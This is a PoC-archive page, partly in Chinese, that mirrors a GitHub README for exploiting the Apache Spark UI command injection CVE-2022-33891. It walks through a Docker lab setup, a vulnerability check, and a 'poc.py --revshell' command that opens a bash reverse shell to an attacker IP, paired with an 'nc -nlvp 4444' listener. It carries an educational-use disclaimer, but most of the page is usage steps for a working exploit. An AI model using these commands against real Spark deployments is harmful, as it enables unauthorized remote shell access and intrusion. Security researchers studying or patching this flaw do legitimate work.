POC详情: 4df0ffd7d340fdfe0fb9d8c377982ac70837f9e5

来源
https://github.com/asepsaepdin/CVE-2022-33891
关联漏洞
标题: Apache Spark 操作系统操作系统命令注入漏洞 (CVE-2022-33891)
描述:Apache Spark是美国阿帕奇(Apache)基金会的一款支持非循环数据流和内存计算的大规模数据处理引擎。 Apache Spark 存在操作系统命令注入漏洞,该漏洞源于Apache Spark UI中的 ACL 功能中的输入验证不正确。远程攻击者利用该漏洞可以请求特制 URL 并在目标系统上执行任意操作系统命令。
介绍
<h1 style="font-size:10vw" align="left">CVE-2022-33891 - Apache Spark Command Injection Vulnerability</h1>


<img src="https://img.shields.io/badge/CVSS:3.1%20Score%20-8.8 HIGH-red"> [![Python](https://img.shields.io/badge/Python-%E2%89%A5%203.11-blueviolet.svg)](https://www.python.org/) <img src="https://img.shields.io/badge/Maintained%3F-Yes-96c40f">


******
⚠️ *For educational and authorized security research purposes only*


## Original Exploit Authors
Very grateful to the original PoC author [AkbarTrilaksana](https://github.com/AkbarTrilaksana)


## Description
The Apache Spark UI offers the possibility to enable ACLs via the configuration option spark.acls.enable. With an authentication filter, this checks whether a user has access permissions to view or modify the application. If ACLs are enabled, a code path in HttpSecurityFilter can allow someone to perform impersonation by providing an arbitrary user name. A malicious user might then be able to reach a permission check function that will ultimately build a Unix shell command based on their input, and execute it. This will result in arbitrary shell command execution as the user Spark is currently running as. This affects Apache Spark versions 3.0.3 and earlier, versions 3.1.1 to 3.1.2, and versions 3.2.0 to 3.2.1.


******
## Step Guides
1. First, clone the repository
    ```bash
    git clone https://github.com/asepsaepdin/CVE-2022-33891.git
    ```
    
2. Change directory
    ```bash
    cd CVE-2022-33891
    ```
    
3. Install the dependencies:
    ```bash
    pip3 install -r requirements.txt --break-system-packages
    ```

4. Let the container spin up
    ```bash
    docker compose up
    ```
    
5.  In a new terminal, run command
    ```bash
    docker exec -it CVE-2022-33891-spark-1 /bin/bash
    ```

6.  In the container bash session, enter:
    ```bash
    echo "spark.acls.enable       true" >> conf/spark-defaults.conf
    ```
    
7.  Optionally, cat the contents of spark-defaults.conf to make sure it looks good.

8.  Exit the interactice bash shell and Ctl-C your docker-compose process.

9.  Once the containers have powered down gracefully, rerun docker-compose up
    ```bash
    docker compose up
    ```
    
10. Check to see if the target is vulnerable:
    ```bash
    python3 poc.py -u http://localhost -p 8080 --check
    ```
    
11. From an attacker perspective, remote code execution is critical to get access to an interactive shell. So, executing the following command would trigger a telnet reverse shell over tcp based on bash to attacker’s system on port 4444/tcp:
    ```bash
    python3 poc.py -u http://localhost -p 8080 --revshell -lh 172.16.10.24 -lp 4444
    ```
    ```bash
    nc -nlvp 4444
    ```
    
 
******
## Credits
- https://github.com/AkbarTrilaksana/cve-2022-33891
- https://nvd.nist.gov/vuln/detail/cve-2022-33891
文件快照

 [4.0K]  /data/pocs/4df0ffd7d340fdfe0fb9d8c377982ac70837f9e5
├── [ 311]  docker-compose.yml
├── [3.5K]  poc.py
├── [2.8K]  README.md
└── [  17]  requirements.txt

0 directories, 4 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。